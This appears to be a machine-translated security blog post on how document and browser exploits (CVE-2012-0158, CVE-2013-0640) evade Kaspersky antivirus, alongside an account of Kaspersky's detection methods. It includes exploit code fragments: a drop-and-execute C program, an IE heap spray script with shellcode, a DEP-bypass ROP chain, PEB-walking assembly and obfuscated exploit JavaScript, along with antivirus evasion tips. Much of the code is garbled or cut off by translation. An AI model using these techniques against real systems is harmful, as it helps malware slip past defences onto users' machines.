The path to confrontation between vulnerability exploitation and Kaspersky
0x00 Thank you
I am particularly grateful to all of you for your support for your work this year. If you do not have any suggestions, you can only write some articles to make everyone happy. If you have any mistakes, please kindly point out, grateful!
First, thank you for your help:
Quange
No score
Instruder
My lovely colleagues
0x01 inscription:
The topic is about the confrontation between vulnerability exploitation and Kaspersky. The reason why Kaspersky is selected is that it is typical in many anti-virus software products, from memory detection and removal in to the latest popular behavior detection cloud detection and removal, Kaspersky has been keeping up with the pace of the times and has become more accurate and effective in the detection and removal of vulnerabilities, like Norton and Bitdefender, it is one of the most difficult to bypass. Anti-virus software is the most rigorous in the detection and removal of document and browser vulnerabilities. This article also describes how to use these two types of vulnerabilities as an example.
The development of vulnerability exploitation technology is also the development of anti-virus software detection and removal technology. It can be seen that all kinds of technologies are cool and cool. The Bypass Method for Kaspersky Anti-Virus Software is even more eye-catching, basically, the method that bypasses Kaspersky can basically kill other soft tools. This is also the purpose of analyzing and summarizing the use of vulnerabilities against Kaspersky, by analyzing the confrontation between the two from the perspective of a bystander, we can better understand the development of confrontation between vulnerability exploitation and anti-virus software.
The relevant code used in this article is extracted from the actual vulnerability utilization instance, and will not actually provide the relevant vulnerability sample. Please forgive me for this. If you don't talk nonsense, let's start with the question:
0x02 basic form of exploits
MS Office vulnerability decline, Adobe Reader PDF vulnerability is in the ascendant, Flash Player vulnerability strength rise and the current browser UAF vulnerability, there are a variety of vulnerability forms, but the basic idea of exploits has not changed much. There are only two forms: Download, execute, release, and execute, the ultimate goal of exploits is to execute a program. The purpose of anti-virus software detection and removal is to detect such behaviors and trigger alarms and prevent them from running. The final pseudocode for exploits is as follows:
/*************************************** *********************************** Demonstrate the use of pseudocode by exploiting vulnerabilities * //************************************** * ********************************/# include <windows. h> void main () {HANDLE hFileHandle; // The main file HANDLE hExeFile; // The exe program HANDLE char exploitName [MAX_PATH] = "bin. xxx "; // Exploit subject file path char tempPath [MAX_PATH] = {0}; DWORD dwWrite = 0; DWORD exeBufferOffset = 0x1000; // offset char exebuffer [1024] = {0} in the exe Exploit entity file; // buffer hFileHandle = CreateFileA (exploitName, // Exploit entity file path GENERIC_READ, file_pai_read, NULL, OPEN_EXISTING, NULL, NULL); SetFilePointer (hFileHandle, exeBufferOffset, NULL, FILE_BEGIN); ReadFile (hFileHandle, exebuffer, sizeof (exebuffer), & dwWrite, NULL ); // read the file GetTempPathA (MAX_PATH, tempPath); // obtain the temp path strcat_s (tempPath, "winexe.exe"); hExeFile = CreateFileA (tempPath, // create exe GENERIC_WRITE, file_cmd_write, NULL, CREATE_ALWAYS, NULL, NULL); WriteFile (hExeFile, exebuffer, sizeof (exebuffer), & dwWrite, NULL); CloseHandle (hFileHandle); CloseHandle (hExeFile); WinExec (tempPath, SW_SHOW); // execute exe }}
Take the behavior pseudocode released and executed as an example, you can get the following information:
(1) ShellCode uses the operating system API functions
(2) the path of the subject file must be obtained first.
(3) Reading executable files through offset
(4) Get % temp % or another path
(5) Generate and execute executable programs
Before ShellCode can be executed, there are many methods to exploit vulnerabilities, such as Heap Spray, bypassing address randomization (ASLR) + Data Execution Protection (DEP ).
1. Heap Spray
Heap padding is widely used in browser and Flash Player-related vulnerabilities. This method is also used in early versions of Adobe Reader. Its core idea is to fill in a large amount of useless data in the process memory space. After the vulnerability is triggered, the ShellCode will jump through the corresponding skills.
The following is a simple example of code commonly used in IE browsers:
<SCRIPT language = "javascript"> var heapSprayToAddress = 0x05050505; // heap filling address, will eventually be used for shellcode Execution // line address var payLoadCode = unescape (// ShellCode "% u9090 % u9090 % region % u0044 % u0000 % u458B % u8B3C % u057C % u0178 % region % u184F % u5F8B % u0120 "); var heapBlockSize = 0x400000; // heap fill size var payLoadSize = payLoadCode. length * 2; var spraySlideSize = heapBlockSize-(payLoadSize + 0x38); var spraySlide = unescape ("% u0505 % u0505"); spraySlide = trim (spraySlide, spraySlideSize ); heapBlocks = (heapSprayToAddress-0x400000)/heapBlockSize; memory = new Array (); for (I = 0; I
Flash Player and Adobe Reader also adopt similar methods to achieve heap filling. If you are interested, you can search for the exposed POC on the network.
2. ASLR + DEP
Address randomization and Data Execution Protection are a common protection technology in the latest operating systems. To execute ShellCode, you must bypass ASLR + DEP. Currently, there are two main methods used: leak the Module Base Address and use the DLL module without ASRL. The ultimate goal is to bypass DEP.
Given that the current common technology is to use ROP, the code format is as follows:
## ROP rop = struct.pack("<I",0x77bf362c) # POP EBX / RETrop += struct.pack("<I",0x41414141) # junkrop += struct.pack("<I",0x41414141) # junkrop += struct.pack("<I",0xFFFFFFFF) # 00000000rop += struct.pack("<I",0x7e810b7e) # INC EBX / RETrop += struct.pack("<I",0x77bebb36) # POP EBP / RETrop += struct.pack("<I",0x7C862144) # SetProcessDEPPolicyrop += struct.pack("<I",0x77bf3b47) # POP EDI / RETrop += struct.pack("<I",0x77be1110) # RETrop += struct.pack("<I",0x77bf1891) # POP ESI / RETrop += struct.pack("<I",0x77be2091) # RETrop += struct.pack("<I",0x7e6ea62b) # PUSHAD / RET ####
You can call system functions such as SetProcessDEPPolicy and VirtualProtect to modify some memory attributes, change them to executable, and then jump to the execution.
3. FS: [30] Get the Kernel32 base address
FS: [30] In essence, this method obtains the base address of Kernel32 through PEB and then the function address in Kernel32. The Code is as follows:
xor eax, eax ; // clear eaxmov eax, fs:[ 0x30 ] ; // get a pointer to the PEBmov eax, [ eax + 0x0C ] ; // get PEB->Ldrmov eax, [ eax + 0x14 ] ; // get PEB->Ldr.InMemoryOrderModuleList.Flink ;//(1st entry)mov eax, [ eax ] ; // get the next entry (2nd entry)mov eax, [ eax ] ; // get the next entry (3rd entry)mov ebp, [ eax + 0x10 ] ; // get the 3rd entries base address ;//(kernel32.dll)
After obtaining the kernel32 base address, you can use many methods to obtain the function address. You can search for relevant information on the Internet.
0x03 Kaspersky's Confrontation strategy
According to the above vulnerability exploitation method, Kaspersky can conduct targeted detection and removal in the above method. At the beginning, compared with the detection and removal of viruses and Trojans, Kaspersky found weak vulnerability exploitation. Later, due to the increasingly widespread use of vulnerabilities, the methods used were the same, its Improvement speed is very fast, and targeted detection and removal of vulnerability exploitation methods are carried out.
Behavior detection and removal and virtual machine execution check are popular methods of soft detection and removal in the past two or three years. None of them are embarrassed to say that they are anti-virus software.
1. Heap Spray Detection
Including browsers (IE, Chrome, Firefox), Adobe Reader, and Flash Player, Spray code features are very obvious. The following code
var spraySlide = unescape("%u0505%u0505");
Javasript code converts the unescape () function into hexadecimal characters, and then fills in the heap. Grasping this behavioral feature, coupled with subsequent filling operations, can be used as an obvious feature.
Kaspersky uses the decryption function of JavaScript obfuscated code. Simple operations such as XOR or shift modification can restore the real code and generate alarms for users.
2. shellcode behavior detection
The final behavior of ShellCode is to execute an executable program. In the end, it is necessary to call the relevant API execution functions, such as WinExec, Createprocess, ShellExecute, and CreateProcessInternal, to perform important monitoring on the preceding API functions.
Kaspersky does not HOOK the Ring3 layer functions, which is different from that of coffee. Instead, it performs a detailed inspection on all aspects of the API function execution at the Ring0 layer, this includes the function call stack, function return address, and EXE file path. If one of them meets the detection rules, an alarm is triggered accordingly.
The call stack detection mainly compares the stacks of currently called API functions. Generally, Heap Spray jumps to the ShellCode for execution. The current stack frame pointer (ESP) is definitely not the original stack frame but the address on the stack, similar to the GS option in VS development, the stack frame for ShellCode Execution is inconsistent with the default stack frame.
When the program runs normally, after the function call is completed, it will be returned to the space of the Program for further execution. However, after the function call is completed in ShellCode, It will be returned to the heap for execution, an obvious exception.
The release of Trojans or viruses is completed by ShellCode. The release directory is sensitive, such as C: \ Windows, C: \ Widnwos \ System32, etc, during vulnerability exploitation, directories such as % temp % are usually selected because the system has read and write permissions and does not have to consider permissions, basically, the monitoring of sensitive directories is a required function for each software killer, and Kaspersky is no exception.
3. Vulnerability Feature Detection
Each type of vulnerability has its own obvious characteristics. After Kaspersky locates the vulnerability characteristics, it can generate a precise CVE number, which is very helpful to users, such:
Figure 1: Kaspersky alarm Diagram
Kaspersky alarm information directly prompts the CVE-2012-0158, this is its extraction of the first features of the vulnerability as a pattern, precise vulnerability identification.
With simple search, you can find out that the pattern detected by Kaspersky is also the key location for triggering this vulnerability:
Figure 2: Cobj is a critical vulnerability location
4. Key file and directory monitoring
As mentioned above, sensitive directories include System directories and User Directories. The % temp % directory has the permission to read, write, and execute all users, the first priority is anti-virus software monitoring.
As mentioned above, Kaspersky is increasingly strict with the vulnerability detection. The four points described previously are only a small part of the vulnerability detection. I can only analyze the samples, please forgive me.
Kaspersky's detection strategy is not a single one. Instead, it uses a variety of detection strategies for combined detection. For example, a browser vulnerability uses code to bypass JavaScript decoding detection, but it cannot be bypassed in the ShellCode section.
0x04 exploiting Kaspersky Detection Policy
There is no final conclusion. It is also applicable to the confrontation between vulnerability exploitation and anti-virus software, which is a combination of conflicting developments. The main idea of exploiting the vulnerability to combat anti-virus software that uses Kaspersky code is to identify malicious code as a program to execute normal code and confuse anti-virus software's ability to identify malicious code, by grasping this point, you can understand the skills that have been carefully crafted by exploiting Kaspersky:
1. obfuscation of script code
It represents the Skills Used in the exploitation of a type of vulnerability. Looking at the actual vulnerability exploitation samples on the internet, none of them directly use the original script code, which has been cleverly constructed, encryption obfuscation is the simplest, and the code that is finally obfuscated is completely unrecognizable. It is difficult for analysts to manually analyze the Code, which requires a lot of effort, let alone the software can be identified.
function eQUIVALENT(cARDINI) { var mIRACOL = rIGUARDI(vILMENTE(cARDINI)); while (mIRACOL.length < (2 * 2 * 2 * 2 * 2 * 2 * 2 * 2 * 2 * 2 * 2 * 13 * 2)) mIRACOL += mIRACOL; pECCATORE((2 * 2 * 2 * 2 * 2 * 2 * 2 * 2 * 2)); var cHIAMATO = []; var rENDUTO = ((cARDINI >>> 16) & (13 + 2 * 11 * 11)).toString((2 * 5 + 2 * 3)); var sMISURATO = (cARDINI >>> 24).toString((3 * 3 + 7)); if (rENDUTO.length == 1) rENDUTO = "0" + rENDUTO; if (sMISURATO.length == 1) sMISURATO = "0" + sMISURATO; if (vOLENCI["dIAVOLO"].indexOf("9.") == 0) for (var oFFICIO = 10; oFFICIO < 80; oFFICIO++) { var gANELLONE = rIGUARDO(rENDUTO + sMISURATO); cHIAMATO.push(mIRACOL.substring(0, ((2 * 5 * 2 * 19 * 139) / 2) - 3) + gANELLONE); } else for (var oFFICIO = 10; oFFICIO < 80; oFFICIO++) { var gANELLONE = rIGUARDO(rENDUTO + sMISURATO); cHIAMATO.push(mIRACOL.substring(0, ((47 * 2 * 7 * 5 * 2 * 2 * 2 * 2) / 2) - 3) + gANELLONE); } var dEFECTIVE = []; for (var aLLODETTA = 0; aLLODETTA < cHIAMATO.length; aLLODETTA++) if (aLLODETTA % 2 == 0) dEFECTIVE.push(cHIAMATO[aLLODETTA] + qUETARSI); pECCATORE(vOLENCI[sHOGG('rtboteejucaOCn', 4013, 6949)]);}var cONTRARIA = [];function dISGRIEVI(pRELIBA) { if (vOLENCI[sHOGG('IAVOLOd', 9323, 8863)].indexOf("9.") == 0) for (var oFFICIO = 10; oFFICIO < 40; oFFICIO++) pOSSEDER.push(gRIDARO.substring(0, ((3 * 3 * 61 * 3 * 17 + 24821) / 2) - 3) + oFFICIO.toString()); else for (var oFFICIO = 10; oFFICIO < 40; oFFICIO++) pOSSEDER.push(gRIDARO.substring(0, ((3 * 239 * 2 * 2 + 541 * 2 * 2 * 23) / 2) - 3) + oFFICIO.toString()); pECCATORE(pRELIBA);}
The above code is excerpted from the Javascript code used by the CVE-2013-0640 Adobe Reader vulnerability, all variable names and function names are randomized, some functions can only be identified by speculation, there is no direct memory fill operation in the code.
The poor readability of the encrypted and Obfuscated Script code makes people crazy. Kaspersky will spend a lot of memory decoding, considering the performance and user experience, it will think this is a normal code execution. Of course, this is the previous situation. At present, Kaspersky can certainly detect this code.
2. ShellCode diversity
All the major roads refer to Rome to describe ShellCode's deformation and diversification. As long as it is able to achieve the ultimate goal of executing the EXE, ShellCode will use a variety of tricks and tricks, so there is no need for it.
Encryption of ShellCode, such as simple operations such as XOR or shifting, cannot defend against Kaspersky, and its decoding capability for ShellCode is very powerful. Currently, the samples show that some vulnerabilities are no longer encrypted by ShellCode. Instead, they start from other aspects, such as performing skillful modifications.
The ShellCode Execution stack is executed in the process default stack frame, ShellCode is executed in the form of a drop-down chain, the process default module code is used before and after the API is called to execute the function, and third-party modules are called to execute the EXE, etc, we will not list them one by one here.
The simple sample code is as follows:
#include <windows.h>void main(){ WinExec("cmd.exe %temp%\\calc.exe",SW_SHOW);}
After passing through example. exeto execute calc.exein the temptember directory, there is also an deformation ratio, such as copying cmd.exe to another directory. Third-party programs must ensure that the system defaults and Kaspersky will not stop them from running. Currently, This ShellCode exploitation method has been patched by Kaspersky.
3. File Format Deformation
In this regard, many file format vulnerabilities are exploited. Due to its complexity, to ensure the success rate and Stability of vulnerability triggering, you can change the initial sample to a final exploitation document with a format that is complex and nested with various file element images, shellCode can be anywhere in the document.
From the sample analysis, if the above method does not bypass Kaspersky, another big killer is to encrypt the document. Adobe Reader samples mostly use this method, kaspersky does not have any decryption capability for the encrypted document and cannot perform any detection. It can only be considered as a normal document. This is the first step. Subsequent ShellCode Detection during document opening does not give up the detection because it is determined to be a normal document. Therefore, after statically bypassing Kaspersky detection, other detection methods of Kaspersky need to be reversed.
0x05 Summary
I originally wanted to write an article about the confrontation between vulnerabilities and Kaspersky. However, some of the details cannot be described here, finally, I wrote such a popular science article. In the future, I will add some details in this article. Sorry, we have a lot of nonsense and we have nothing to do with it.
Kaspersky is a very powerful anti-virus software, which is beyond doubt. The exploitation of vulnerabilities and confrontation between the two sides have also promoted the improvement of both sides's technical capabilities and level, opening up my eyes.
The road is long, and I will go up and down, and I would like to send this sentence to my friends who fought in the front line of the reverse.